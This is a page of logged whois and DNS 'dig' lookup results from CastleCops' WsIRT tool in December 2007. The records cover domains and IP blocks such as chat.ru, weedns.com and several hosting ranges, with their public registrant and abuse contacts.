WsIRT^(TM)

• whois
• dig
• host
• fetch
• asn

---

whois

at 08 Dec, 2007 @ 06:57:55
GeekTools Whois Proxy v5.0.4 Ready. Checking access for CastleCops WsIRT... ok. Checking server [whois.ripn.net] Results: % By submitting a query to RIPN's Whois Service % you agree to abide by the following terms of use: % http://www.ripn.net/about/servpol.html#3.2 (in Russian) % http://www.ripn.net/about/en/servpol.html#3.2 (in English). domain: CHAT.RU type: CORPORATE nserver: ns2.internal.ru. nserver: ns3.internal.ru. nserver: ns1.internal.ru. state: REGISTERED, DELEGATED org: Suntor Limited phone: +1 213 4772352 fax-no: +1 213 4772352 e-mail: domain4ru@gmail.com registrar: RUCENTER-REG-RIPN created: 1996.11.05 paid-till: 2008.12.01 source: TC-RIPN Last updated on 2007.12.08 09:46:49 MSK/MSD Results brought to you by the GeekTools WHOIS Proxy Server results may be copyrighted and are used with permission. Your host (CastleCops WsIRT) has visited 941 times today.

---

whois

at 09 Dec, 2007 @ 18:44:58
GeekTools Whois Proxy v5.0.4 Ready. Checking access for CastleCops WsIRT... ok. Final results obtained from whois.ripe.net. Results: % This is the RIPE Whois query server #2. % The objects are in RPSL format. % % Rights restricted by copyright. % See http://www.ripe.net/db/copyright.html % Note: This output has been filtered. % To receive output for a database update, use the "-B" flag % Information related to '195.161.119.0 - 195.161.119.255' inetnum: 195.161.119.0 - 195.161.119.255 netname: EHOUSE descr: eHouse (co-location) network country: RU admin-c: YR1-RIPE admin-c: YR1-RIPE tech-c: YR1-RIPE status: ASSIGNED PA mnt-by: AS8342-MNT source: RIPE # Filtered person: Yuri A. Ryazantsev address: eHouse address: 14 bld. 1, Kedrova str. address: RU-117218, Moscow address: Russia remarks: phone: +7 095 7190521 phone: +7 495 7190521 remarks: fax-no: +7 095 1257949 fax-no: +7 495 1257949 e-mail: yuri@ehouse.ru nic-hdl: YR1-RIPE source: RIPE # Filtered remarks: modified for Russian phone area changes % Information related to '195.161.0.0/16AS8342' route: 195.161.0.0/16 descr: RTCOMM-RU origin: AS8342 mnt-by: AS8342-MNT source: RIPE # Filtered Results brought to you by the GeekTools WHOIS Proxy Server results may be copyrighted and are used with permission. Your host (CastleCops WsIRT) has visited 3 times today.

---

whois

at 09 Dec, 2007 @ 18:47:38
GeekTools Whois Proxy v5.0.4 Ready. Checking access for CastleCops WsIRT... ok. Checking server [whois.crsnic.net] Checking server [whois.enom.com] Results: =-=-=-= Visit AboutUs.org for more information about weedns.com <a href="http://www.aboutus.org/weedns.com">AboutUs: weedns.com</a> Registration Service Provided By: whyI.org Contact: dns@whyI.org Visit: http://www.whyI.org/ Domain name: weedns.com Registrant Contact: Crackerjack Networking Solutions Tyler MacDonald (dns@whyI.org) +1.6045218080 Fax: PO Box 48546 Vancouver, BC V7X 1A3 CA Administrative Contact: Crackerjack Networking Solutions Tyler MacDonald (dns@whyI.org) +1.6045218080 Fax: PO Box 48546 Vancouver, BC V7X 1A3 CA Technical Contact: Crackerjack Networking Solutions Tyler MacDonald (dns@whyI.org) +1.6045218080 Fax: PO Box 48546 Vancouver, BC V7X 1A3 CA Status: Locked Name Servers: connubialis.crackerjack.net fumo-viridus.crackerjack.net Creation date: 23 Nov 2001 20:55:19 Expiration date: 23 Nov 2008 20:55:19 =-=-=-= The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. We make this information available "as is," and do not guarantee its accuracy. By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. Version 6.3 4/3/2002 Results brought to you by the GeekTools WHOIS Proxy Server results may be copyrighted and are used with permission. Your host (CastleCops WsIRT) has visited 4 times today.

---

whois

at 09 Dec, 2007 @ 18:48:36
GeekTools Whois Proxy v5.0.4 Ready. Checking access for CastleCops WsIRT... ok. Checking server [whois.dns.be] Results: % .be Whois Server 4.0 % % (c) dns.be 2001-2004 (http://www.dns.be) % %- The WHOIS service offered by DNS and the access to the records in the DNS %- WHOIS database are provided for information purposes only. It allows %- persons to check whether a specific domain name is still available or not %- and to obtain information related to the registration records of %- existing domain names. %- %- DNS cannot, under any circumstances, be held liable where the stored %- information would prove to be incomplete or inaccurate in any sense. %- %- By submitting a query you agree not to use the information made available %- to: %- - allow, enable or otherwise support the transmission of unsolicited, %- commercial advertising or other solicitations whether via email or otherwise; %- - target advertising in any possible way; %- - to cause nuisance in any possible way to the domain name holders by sending %- messages to them (whether by automated, electronic processes capable of %- enabling high volumes or other possible means). %- %- Without prejudice to the above, it is explicitly forbidden to extract, copy %- and/or use or re-utilise in any form and by any means (electronically or %- not) the whole or a quantitatively or qualitatively substantial part %- of the contents of the WHOIS database without prior and explicit permission %- by DNS, nor in any attempt thereof, to apply automated, electronic %- processes to DNS (or its systems). %- %- You agree that any reproduction and/or transmission of data for commercial %- purposes will always be considered as the extraction of a substantial %- part of the content of the WHOIS database. %- %- By submitting the query you agree to abide by this policy and accept that %- DNS can take measures to limit the use of its whois services in order to %- protect the privacy of its registrants or the integrity of the database. %- % WHOIS opendns Domain: opendns Status: REGISTERED Registered: Fri May 24 2002 Licensee: Not shown, please visit www.dns.be for webbased whois. Agent Technical Contacts: Last Name: Charlier Olivier Company Name: ANAGRAMME sprl Language: en Street: Rue Jules Destree 170 Location: 6150 Anderlues Country: BE Phone: +32.70660554 Fax: +32.70660686 Email: dnsmaster@belhosting.net Agent: Name: Are you IN for business? Website: http://www.inforbusiness.com Nameservers: dns3.belhosting.net dns1.belhosting.net dns2.belhosting.net dns4.belhosting.net Results brought to you by the GeekTools WHOIS Proxy Server results may be copyrighted and are used with permission. Your host (CastleCops WsIRT) has visited 5 times today.

---

whois

at 09 Dec, 2007 @ 18:49:21
GeekTools Whois Proxy v5.0.4 Ready. Checking access for CastleCops WsIRT... ok. Checking server [whois.dns.be] Results: % .be Whois Server 4.0 % % (c) dns.be 2001-2004 (http://www.dns.be) % %- The WHOIS service offered by DNS and the access to the records in the DNS %- WHOIS database are provided for information purposes only. It allows %- persons to check whether a specific domain name is still available or not %- and to obtain information related to the registration records of %- existing domain names. %- %- DNS cannot, under any circumstances, be held liable where the stored %- information would prove to be incomplete or inaccurate in any sense. %- %- By submitting a query you agree not to use the information made available %- to: %- - allow, enable or otherwise support the transmission of unsolicited, %- commercial advertising or other solicitations whether via email or otherwise; %- - target advertising in any possible way; %- - to cause nuisance in any possible way to the domain name holders by sending %- messages to them (whether by automated, electronic processes capable of %- enabling high volumes or other possible means). %- %- Without prejudice to the above, it is explicitly forbidden to extract, copy %- and/or use or re-utilise in any form and by any means (electronically or %- not) the whole or a quantitatively or qualitatively substantial part %- of the contents of the WHOIS database without prior and explicit permission %- by DNS, nor in any attempt thereof, to apply automated, electronic %- processes to DNS (or its systems). %- %- You agree that any reproduction and/or transmission of data for commercial %- purposes will always be considered as the extraction of a substantial %- part of the content of the WHOIS database. %- %- By submitting the query you agree to abide by this policy and accept that %- DNS can take measures to limit the use of its whois services in order to %- protect the privacy of its registrants or the integrity of the database. %- % WHOIS blueline Domain: blueline Status: REGISTERED Registered: Thu Sep 11 1997 Licensee: Not shown, please visit www.dns.be for webbased whois. Agent Technical Contacts: First Name: Octave Last Name: Klaba Company Name: OVH Language: fr Street: 140, quai du Sartel Location: 59100 Roubaix Country: FR Phone: +33.320200957 Fax: +33.320200958 Email: tech@ovh.net First Name: Octave Last Name: Klaba Company Name: OVH Language: fr Street: 140, quai du Sartel Location: 59100 Roubaix Country: FR Phone: +33.320200957 Fax: +33.320200958 Email: tech@ovh.net Agent: Name: OVH SARL Website: ovh.fr Nameservers: indra.blueline.be (194.78.199.172) xeres.bluelinesoft.be Results brought to you by the GeekTools WHOIS Proxy Server results may be copyrighted and are used with permission. Your host (CastleCops WsIRT) has visited 6 times today.

---

whois

at 09 Dec, 2007 @ 18:50:08
GeekTools Whois Proxy v5.0.4 Ready. Checking access for CastleCops WsIRT... ok. Checking server [whois.crsnic.net] Checking server [whois.gabia.com] Results: Welcome to GABIA.COM's WHOIS data service. The Data in Gabia' WHOIS database is provided by Gabia for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Gabia does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this Data only for lawful purposes and that, under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail(spam); or (2) enable high volume, automated, electronic processes that apply to Gabia (or its systems). Gabia reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Registrant : HolyNet 713, Hyundai Arion Offitel 147 Kumkok-Dong Bundang-Gu Sungnam-Si Kyungki-Do (135280) Domain Name: DNIP.NET Registrar: Gabia,Inc. (GABIA.COM) Administrative, Technical, Billing Contact: JunSeon Oh hollywar@holywar.net 713, Hyundai Arion Offitel 147 Kumkok-Dong Bundang-Gu Sungnam-Si Kyungki-Do (Tel) 031-712-2250 (fax) 031-712-2256 Record created on JULY 15, 2000 Record expires on JULY 15, 2008 Record last updated on DECEMBER 07, 2005 Domain servers in listed order: NS.DNIP.NET NS2.DNIP.NET Register a domain name at www.gabia.com Results brought to you by the GeekTools WHOIS Proxy Server results may be copyrighted and are used with permission. Your host (CastleCops WsIRT) has visited 7 times today.

---

whois

at 09 Dec, 2007 @ 18:55:56
GeekTools Whois Proxy v5.0.4 Ready. Checking access for CastleCops WsIRT... ok. Final results obtained from whois.nic.ad.jp. Results: [ JPNIC database provides information regarding IP address and ASN. Its use ] [ is restricted to network administration purposes. For further information, ] [ use 'whois -h whois.nic.ad.jp help'. To only display English output, ] [ add '/e' at the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ] Network Information: a. [Network Number] 121.119.171.0-121.119.172.255 b. [Network Name] GMOHS-DS g. [Organization] GMO HOSTING & SECURITY INC. m. [Administrative Contact] JP00014991 n. [Technical Contact] JP00014991 p. [Nameserver] NS.NAMEDSERVER.NET p. [Nameserver] NS2.NAMEDSERVER.NET [Assigned Date] 2007/05/09 [Return Date] [Last Update] 2007/05/09 13:41:06(JST) Less Specific Info. ---------- NTT COMMUNICATIONS CORPORATION [Allocation] 121.112.0.0/13 More Specific Info. ---------- No match!! Results brought to you by the GeekTools WHOIS Proxy Server results may be copyrighted and are used with permission. Your host (CastleCops WsIRT) has visited 8 times today.

---

whois

at 09 Dec, 2007 @ 18:56:54
GeekTools Whois Proxy v5.0.4 Ready. Checking access for CastleCops WsIRT... ok. Final results obtained from whois.apnic.net. Results: % [whois.apnic.net node-1] % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html inetnum: 202.123.64.0 - 202.123.95.255 netname: HENDERSON descr: Henderson Data Centre Limited descr: 6/F, World-Wide House,Central country: HK admin-c: HDC1-HK tech-c: HDC1-HK mnt-by: APNIC-HM mnt-lower: MAINT-HK-HDC status: ALLOCATED PORTABLE changed: hm-changed@apnic.net 20071024 source: APNIC person: Tech Admin address: Henderson Data Centre Limited address: 17/F WELL TECH CENTRE address: 9 Pat Tat Street address: San Po Kong address: Kowloon address: Hong Kong country: HK phone: +852-2908-6900 fax-no: +852-2908-6966 e-mail: tech.admin@ihenderson.com nic-hdl: HDC1-HK mnt-by: MAINT-HK-HDC changed: dnsadmin@hld.com 20010108 source: APNIC Results brought to you by the GeekTools WHOIS Proxy Server results may be copyrighted and are used with permission. Your host (CastleCops WsIRT) has visited 9 times today.

---

whois

at 09 Dec, 2007 @ 18:58:44
GeekTools Whois Proxy v5.0.4 Ready. Checking access for CastleCops WsIRT... ok. Final results obtained from whois.apnic.net. Results: % [whois.apnic.net node-1] % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html inetnum: 211.21.0.0 - 211.21.255.255 netname: HINET-TW descr: CHTD, Chunghwa Telecom Co.,Ltd. descr: Data-Bldg.6F, No.21, Sec.21, Hsin-Yi Rd. descr: Taipei Taiwan 100 country: TW admin-c: HN27-AP tech-c: HN28-AP remarks: This information has been partially mirrored by APNIC from remarks: TWNIC. To obtain more specific information, please use the remarks: TWNIC whois server at whois.twnic.net. mnt-by: MAINT-TW-TWNIC changed: hostmaster@twnic.net 20000707 status: ALLOCATED PORTABLE source: APNIC person: HINET Network-Adm address: CHTD, Chunghwa Telecom Co., Ltd. address: Data-Bldg. 6F, No. 21, Sec. 21, Hsin-Yi Rd., address: Taipei Taiwan 100 country: TW phone: +886 2 2322 3495 phone: +886 2 2322 3442 phone: +886 2 2344 3007 fax-no: +886 2 2344 2513 fax-no: +886 2 2395 5671 e-mail: network-adm@hinet.net nic-hdl: HN27-AP remarks: same as TWNIC nic-handle HN184-TW mnt-by: MAINT-TW-TWNIC changed: hostmaster@twnic.net 20000721 source: APNIC person: HINET Network-Center address: CHTD, Chunghwa Telecom Co., Ltd. address: Data-Bldg. 6F, No. 21, Sec. 21, Hsin-Yi Rd., address: Taipei Taiwan 100 country: TW phone: +886 2 2322 3495 phone: +886 2 2322 3442 phone: +886 2 2344 3007 fax-no: +886 2 2344 2513 fax-no: +886 2 2395 5671 e-mail: network-center@hinet.net nic-hdl: HN28-AP remarks: same as TWNIC nic-handle HN185-TW mnt-by: MAINT-TW-TWNIC changed: hostmaster@twnic.net 20000721 source: APNIC inetnum: 211.21.125.0 - 211.21.125.255 netname: HINET-NET descr: Chunghwa Telecom Data Communication Business Group descr: Taipei Taiwan country: TW admin-c: HN184-TW tech-c: HN184-TW mnt-by: MAINT-TW-TWNIC remarks: This information has been partially mirrored by APNIC from remarks: TWNIC. To obtain more specific information, please use the remarks: TWNIC whois server at whois.twnic.net. changed: fkchung@ms1.hinet.net 20000707 status: ASSIGNED NON-PORTABLE source: TWNIC person: HINET Network-Adm address: CHTD, Chunghwa Telecom Co., Ltd. address: Taipei Taiwan e-mail: network-adm@hinet.net nic-hdl: HN184-TW changed: hostmaster@twnic.net.tw20000721 source: TWNIC Results brought to you by the GeekTools WHOIS Proxy Server results may be copyrighted and are used with permission. Your host (CastleCops WsIRT) has visited 10 times today.

---

whois

at 09 Dec, 2007 @ 18:59:05
GeekTools Whois Proxy v5.0.4 Ready. Checking access for CastleCops WsIRT... ok. Final results obtained from whois.arin.net. Results: Savvis SAVVIS (NET-216-32-0-0-1) 216.32.0.0 - 216.35.255.255 Layered Technologies, Inc. NET-216-32-64-0 (NET-216-32-64-0-1) 216.32.64.0 - 216.32.95.255 # ARIN WHOIS database, last updated 2007-12-08 19:10 # Enter ? for additional hints on searching ARIN's WHOIS database. Results brought to you by the GeekTools WHOIS Proxy Server results may be copyrighted and are used with permission. Your host (CastleCops WsIRT) has visited 11 times today.

---

whois

at 09 Dec, 2007 @ 18:59:31
GeekTools Whois Proxy v5.0.4 Ready. Checking access for CastleCops WsIRT... ok. Final results obtained from whois.arin.net. Results: OrgName: ThePlanet.com Internet Services, Inc. OrgID: TPCM Address: 1333 North Stemmons Freeway Address: Suite 110 City: Dallas StateProv: TX PostalCode: 75207 Country: US ReferralServer: rwhois://rwhois.theplanet.com:4321 NetRange: 67.18.0.0 - 67.19.255.255 CIDR: 67.18.0.0/15 NetName: NETBLK-THEPLANET-BLK-11 NetHandle: NET-67-18-0-0-1 Parent: NET-67-0-0-0-0 NetType: Direct Allocation NameServer: NS1.THEPLANET.COM NameServer: NS2.THEPLANET.COM Comment: RegDate: 2004-03-15 Updated: 2004-07-29 RTechHandle: PP46-ARIN RTechName: Pathos, Peter RTechPhone: +1-214-782-7800 RTechEmail: admins@theplanet.com OrgAbuseHandle: ABUSE271-ARIN OrgAbuseName: Abuse OrgAbusePhone: +1-214-782-7802 OrgAbuseEmail: abuse@theplanet.com OrgNOCHandle: TECHN33-ARIN OrgNOCName: Technical Support OrgNOCPhone: +1-214-782-7800 OrgNOCEmail: admins@theplanet.com OrgTechHandle: TECHN33-ARIN OrgTechName: Technical Support OrgTechPhone: +1-214-782-7800 OrgTechEmail: admins@theplanet.com # ARIN WHOIS database, last updated 2007-12-08 19:10 # Enter ? for additional hints on searching ARIN's WHOIS database. Results brought to you by the GeekTools WHOIS Proxy Server results may be copyrighted and are used with permission. Your host (CastleCops WsIRT) has visited 12 times today.

---

whois

at 09 Dec, 2007 @ 19:00:08
GeekTools Whois Proxy v5.0.4 Ready. Checking access for CastleCops WsIRT... ok. Final results obtained from whois.ripe.net. Results: % This is the RIPE Whois query server #3. % The objects are in RPSL format. % % Rights restricted by copyright. % See http://www.ripe.net/db/copyright.html % Note: This output has been filtered. % To receive output for a database update, use the "-B" flag. % Information related to '80.247.203.0 - 80.247.203.255' inetnum: 80.247.203.0 - 80.247.203.255 netname: NL-EXONET-COLOCATION-01 descr: Exonet Internet Services - Co-location Range 1 country: NL admin-c: SZJW1-RIPE tech-c: SZRM1-RIPE status: ASSIGNED PA mnt-by: TRUESERVER-MNT mnt-lower: TRUESERVER-MNT mnt-routes: TRUESERVER-MNT source: RIPE # Filtered person: Jesper Weiland address: Exonet Internet Services address: Koopmanslaan 3 address: NL-7005 BK, Doetinchem address: The Netherlands phone: +31 (0)314 37 36 87 e-mail: jesper@exonet.nl remarks: --------------------------------------------------- remarks: ALL abuse e-mail that is sent to this address, remarks: will be deleted. Use abuse@exonet.nl instead. remarks: --------------------------------------------------- nic-hdl: SZJW1-RIPE mnt-by: TRUESERVER-MNT source: RIPE # Filtered person: Robin Mulder address: Exonet Internet Services address: Koopmanslaan 3 address: NL-7005 BK, Doetinchem address: The Netherlands phone: +31 (0)314 37 36 87 e-mail: robin@exonet.nl remarks: --------------------------------------------------- remarks: ALL abuse e-mail that is sent to this address, remarks: will be deleted. Use abuse@exonet.nl instead. remarks: --------------------------------------------------- nic-hdl: SZRM1-RIPE mnt-by: TRUESERVER-MNT source: RIPE # Filtered % Information related to '80.247.192.0/19AS15703' route: 80.247.192.0/19 descr: TrueServer B.V. - 2Fast Internet Services origin: AS15703 mnt-by: TOO-FAST-MNT source: RIPE # Filtered

---

whois

at 09 Dec, 2007 @ 19:00:45
GeekTools Whois Proxy v5.0.4 Ready. Checking access for CastleCops WsIRT... ok. Final results obtained from whois.ripe.net. Results: % This is the RIPE Whois query server #2. % The objects are in RPSL format. % % Rights restricted by copyright. % See http://www.ripe.net/db/copyright.html % Note: This output has been filtered. % To receive output for a database update, use the "-B" flag % Information related to '80.53.30.232 - 80.53.30.235' inetnum: 80.53.30.232 - 80.53.30.235 netname: CUSTOMER-IDSL-022522 descr: static IP descr: OSIELSKO descr: POLAND country: PL admin-c: TPHT tech-c: TPHT status: ASSIGNED PA mnt-by: TPNET source: RIPE # Filtered role: TP S.A. Hostmaster address: TP S.A. address: ul. Nowogrodzka 47A address: 00-695 Warszawa address: Poland phone: +48 22 6225182 fax-no: +48 22 6225182 remarks: Network problems -> hostmaster@telekomunikacja.pl remarks: Abuse and spam notification -> abuse@telekomunikacja.pl remarks: DNS problems -> dns@telekomunikacja.pl remarks: Routing problems -> registry@tpnet.pl admin-c: TK569-RIPE tech-c: TK569-RIPE tech-c: JS1838-RIPE nic-hdl: TPHT remarks: ! - ! - ! - ! - ! - ! - ! - ! - ! - ! - ! remarks: Please send spam and abuse notification only remarks: to abuse@telekomunikacja.pl remarks: phone: +48 22 8871788 remarks: ! - ! - ! - ! - ! - ! - ! - ! - ! - ! - ! mnt-by: TPNET abuse-mailbox: abuse@telekomunikacja.pl source: RIPE # Filtered % Information related to '80.48.0.0/13AS5617' route: 80.48.0.0/13 descr: TPNET descr: for abuse: abuse@tpnet.pl origin: AS5617 mnt-by: AS5617-MNT source: RIPE # Filtered Results brought to you by the GeekTools WHOIS Proxy Server results may be copyrighted and are used with permission. Your host (CastleCops WsIRT) has visited 14 times today.

---

whois

at 09 Dec, 2007 @ 19:01:21
GeekTools Whois Proxy v5.0.4 Ready. Checking access for CastleCops WsIRT... ok. Final results obtained from whois.ripe.net. Results: % This is the RIPE Whois query server #2. % The objects are in RPSL format. % % Rights restricted by copyright. % See http://www.ripe.net/db/copyright.html % Note: This output has been filtered. % To receive output for a database update, use the "-B" flag % Information related to '84.245.96.0 - 84.245.127.255' inetnum: 84.245.96.0 - 84.245.127.255 netname: SK-4cALL-20050316 descr: 4CONSULT, s.r.o. country: SK admin-c: SKC-RIPE tech-c: SKC-RIPE status: LIR-PARTITIONED PA mnt-by: PEGAS-MNT mnt-lower: PEGAS-MNT mnt-routes: PEGAS-MNT source: RIPE # Filtered role: Slovakia 4CONSULT Contact address: 4CALL, s.r.o. address: Jaroslavova 23 address: Bratislava address: 851 01 address: Slovak Republic phone: +421 2 3388 8511 fax-no: +421 2 3388 8512 e-mail: hostmaster@4call.sk admin-c: RM1149-RIPE tech-c: RM1149-RIPE nic-hdl: SKC-RIPE remarks: - - - - - - - - - - - - - - - - - - - - - - - - - - remarks: - Please send all abuse reports to abuse@4call.sk - remarks: - - - - - - - - - - - - - - - - - - - - - - - - - - mnt-by: PEGAS-MNT source: RIPE # Filtered % Information related to '84.245.96.0/19AS16317' route: 84.245.96.0/19 descr: 4CALL NET origin: AS16317 mnt-by: PEGAS-MNT source: RIPE # Filtered % Information related to '84.245.96.0/20AS16317' route: 84.245.96.0/20 descr: 4CALL NET origin: AS16317 mnt-by: PEGAS-MNT mnt-by: NETLABPLUS-MNT source: RIPE # Filtered Results brought to you by the GeekTools WHOIS Proxy Server results may be copyrighted and are used with permission. Your host (CastleCops WsIRT) has visited 15 times today.

---

whois

at 09 Dec, 2007 @ 19:01:52
GeekTools Whois Proxy v5.0.4 Ready. Checking access for CastleCops WsIRT... ok. Final results obtained from whois.ripe.net. Results: % This is the RIPE Whois query server #3. % The objects are in RPSL format. % % Rights restricted by copyright. % See http://www.ripe.net/db/copyright.html % Note: This output has been filtered. % To receive output for a database update, use the "-B" flag. % Information related to '87.236.196.0 - 87.236.199.255' inetnum: 87.236.196.0 - 87.236.199.255 netname: COOLHOUSING-NET org: ORG-Cs57-RIPE descr: Coolhousing - servers of customers country: CZ admin-c: KU82-RIPE tech-c: OF156-RIPE rev-srv: dns1.coolhousing.net rev-srv: dns2.coolhousing.net status: ASSIGNED PA mnt-by: COOLHOUSING-MNT source: RIPE # Filtered organisation: ORG-Cs57-RIPE org-name: Coolhousing s.r.o. org-type: LIR address: Na okraji 6 address: 16200 address: Prague 6 address: Czech Republic phone: +420777310000 fax-no: +420380425551 admin-c: OF156-RIPE admin-c: PKK6-RIPE admin-c: KU82-RIPE admin-c: FH989-RIPE mnt-ref: RIPE-NCC-HM-MNT mnt-ref: COOLHOUSING-MNT mnt-by: RIPE-NCC-HM-MNT source: RIPE # Filtered person: Karel Umlauf address: Coolhousing, s.r.o. address: Vinohradska 190 address: 130 52 Praha 3 address: Czech Republic, EU phone: +420777310000 nic-hdl: KU82-RIPE mnt-by: COOLHOUSING-MNT abuse-mailbox: abuse@coolhousing.net source: RIPE # Filtered person: Ondrej Filip address: Puklicova 23 address: Ceske Budejovice address: 370 04 address: The Czech Republic phone: +420 220 121 185 fax-no: +420 220 121 184 nic-hdl: OF156-RIPE mnt-by: MARIAS-MNT source: RIPE # Filtered % Information related to '87.236.192.0/21AS35592' route: 87.236.192.0/21 descr: Network of Coolhousing org: ORG-Cs57-RIPE origin: AS35592 mnt-by: COOLHOUSING-MNT source: RIPE # Filtered organisation: ORG-Cs57-RIPE org-name: Coolhousing s.r.o. org-type: LIR address: Na okraji 6 address: 16200 address: Prague 6 address: Czech Republic phone: +420777310000 fax-no: +420380425551 admin-c: OF156-RIPE admin-c: PKK6-RIPE admin-c: KU82-RIPE admin-c: FH989-RIPE mnt-ref: RIPE-NCC-HM-MNT mnt-ref: COOLHOUSING-MNT mnt-by: RIPE-NCC-HM-MNT source: RIPE # Filtered Results brought to you by the GeekTools WHOIS Proxy Server results may be copyrighted and are used with permission. Your host (CastleCops WsIRT) has visited 16 times today.

---

whois

at 09 Dec, 2007 @ 19:02:27
GeekTools Whois Proxy v5.0.4 Ready. Checking access for CastleCops WsIRT... ok. Final results obtained from whois.ripe.net. Results: % This is the RIPE Whois query server #1. % The objects are in RPSL format. % % Rights restricted by copyright. % See http://www.ripe.net/db/copyright.html % Note: This output has been filtered. % To receive output for a database update, use the "-B" flag. % Information related to '88.191.3.0 - 88.191.248.255' inetnum: 88.191.3.0 - 88.191.248.255 netname: FR-DEDIBOX descr: Dedibox SAS descr: Customers descr: Paris, France descr: NCC#2007023902 remarks: trouble: Information: http://www.dedibox.fr/ remarks: trouble: Spam/Abuse requests: http://www.dedibox.fr/abuse/ remarks: trouble: Spam/Abuse requests: mailto:abuse@support.dedibox.fr country: FR admin-c: ACP23-RIPE tech-c: TCP8-RIPE status: ASSIGNED PA mnt-by: PROXAD-MNT source: RIPE # Filtered role: Administrative Contact for ProXad address: Free SAS / ProXad address: 8, rue de la Ville L'Eveque address: 75008 Paris phone: +33 1 73 50 20 00 fax-no: +33 1 73 92 25 69 remarks: trouble: Information: http://www.proxad.net/ remarks: trouble: Spam/Abuse requests: mailto:abuse@proxad.net admin-c: RA999-RIPE tech-c: FG4214-RIPE nic-hdl: ACP23-RIPE mnt-by: PROXAD-MNT source: RIPE # Filtered abuse-mailbox: abuse@proxad.net role: Technical Contact for ProXad address: Free SAS / ProXad address: 8, rue de la Ville L'Eveque address: 75008 Paris phone: +33 1 73 50 20 00 fax-no: +33 1 73 92 25 69 remarks: trouble: Information: http://www.proxad.net/ remarks: trouble: Spam/Abuse requests: mailto:abuse@proxad.net admin-c: RA999-RIPE tech-c: FG4214-RIPE nic-hdl: TCP8-RIPE mnt-by: PROXAD-MNT source: RIPE # Filtered abuse-mailbox: abuse@proxad.net % Information related to '88.160.0.0/11AS12322' route: 88.160.0.0/11 descr: ProXad network / Free SAS descr: Paris, France origin: AS12322 mnt-by: PROXAD-MNT source: RIPE # Filtered Results brought to you by the GeekTools WHOIS Proxy Server results may be copyrighted and are used with permission. Your host (CastleCops WsIRT) has visited 17 times today.

---

dig any

at 08 Dec, 2007 @ 06:57:54
;yurimusimsoumsis.chat.ru. IN A yurimusimsoumsis.chat.ru. 86400 IN A 195.161.119.84 chat.ru. 270 IN NS ns3.internal.ru. chat.ru. 270 IN NS ns2.internal.ru. chat.ru. 270 IN NS ns1.internal.ru. ;chat.ru. IN A chat.ru. 86400 IN A 195.161.119.67 ;chat.ru. IN MX chat.ru. 86400 IN MX 60 relay3.chat.ru. chat.ru. 86400 IN MX 20 relay1.chat.ru. ;chat.ru. IN NS chat.ru. 270 IN NS ns3.internal.ru. chat.ru. 270 IN NS ns2.internal.ru. chat.ru. 270 IN NS ns1.internal.ru. ;chat.ru. IN SOA chat.ru. 86400 IN SOA ns1.internal.ru. postmaster.internal.ru. 1196518990 28800 7200 604800 86400 ;chat.ru. IN TXT ;yurimusimsoumsis.chat.ru. IN CNAME ;yurimusimsoumsis.chat.ru. IN PTR ;chat.ru. IN KEY ;yurimusimsoumsis.chat.ru. IN HINFO ;yurimusimsoumsis.chat.ru. IN AAAA ;; Query time: 215 msec ;; SERVER: 204.152.187.13#53(204.152.187.13) ;; WHEN: Sat Dec 8 06:57:54 2007 ;; MSG SIZE rcvd: 102

---

dig any

at 09 Dec, 2007 @ 18:47:38
; <<>> DiG 9.3.4 <<>> weedns.com any ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 11404 ;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 2, ADDITIONAL: 1 ;; QUESTION SECTION: ;weedns.com. IN ANY ;; ANSWER SECTION: weedns.com. 604800 IN MX 20 crackerjack.yi.org. weedns.com. 86400 IN A 72.55.129.46 weedns.com. 604800 IN NS fumo-viridus.crackerjack.net. weedns.com. 604800 IN NS connubialis.crackerjack.net. ;; AUTHORITY SECTION: weedns.com. 604800 IN NS connubialis.crackerjack.net. weedns.com. 604800 IN NS fumo-viridus.crackerjack.net. ;; ADDITIONAL SECTION: connubialis.crackerjack.net. 172800 IN A 72.55.129.45 ;; Query time: 1 msec ;; SERVER: 204.152.184.68#53(204.152.184.68) ;; WHEN: Sun Dec 9 18:47:38 2007 ;; MSG SIZE rcvd: 190

---

dig any

at 09 Dec, 2007 @ 18:48:36
; <<>> DiG 9.3.4 <<>> opendns.be any ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48185 ;; flags: qr rd ra; QUERY: 1, ANSWER: 7, AUTHORITY: 4, ADDITIONAL: 4 ;; QUESTION SECTION: ;opendns.be. IN ANY ;; ANSWER SECTION: opendns.be. 2526 IN SOA dns1.belhosting.net. dnsmaster.belhosting.net. 2003756448 10800 2048 604800 2560 opendns.be. 60 IN MX 10 smtp.belhosting.net. opendns.be. 59 IN A 217.117.159.84 opendns.be. 86400 IN NS dns4.belhosting.net. opendns.be. 86400 IN NS dns2.belhosting.net. opendns.be. 86400 IN NS dns1.belhosting.net. opendns.be. 86400 IN NS dns3.belhosting.net. ;; AUTHORITY SECTION: opendns.be. 86400 IN NS dns4.belhosting.net. opendns.be. 86400 IN NS dns2.belhosting.net. opendns.be. 86400 IN NS dns1.belhosting.net. opendns.be. 86400 IN NS dns3.belhosting.net. ;; ADDITIONAL SECTION: dns1.belhosting.net. 172799 IN A 217.117.159.82 dns2.belhosting.net. 172799 IN A 91.121.25.33 dns3.belhosting.net. 172799 IN A 217.112.179.20 dns4.belhosting.net. 172799 IN A 213.219.170.202 ;; Query time: 169 msec ;; SERVER: 204.152.184.68#53(204.152.184.68) ;; WHEN: Sun Dec 9 18:48:36 2007 ;; MSG SIZE rcvd: 321

---

dig any

at 09 Dec, 2007 @ 18:49:21
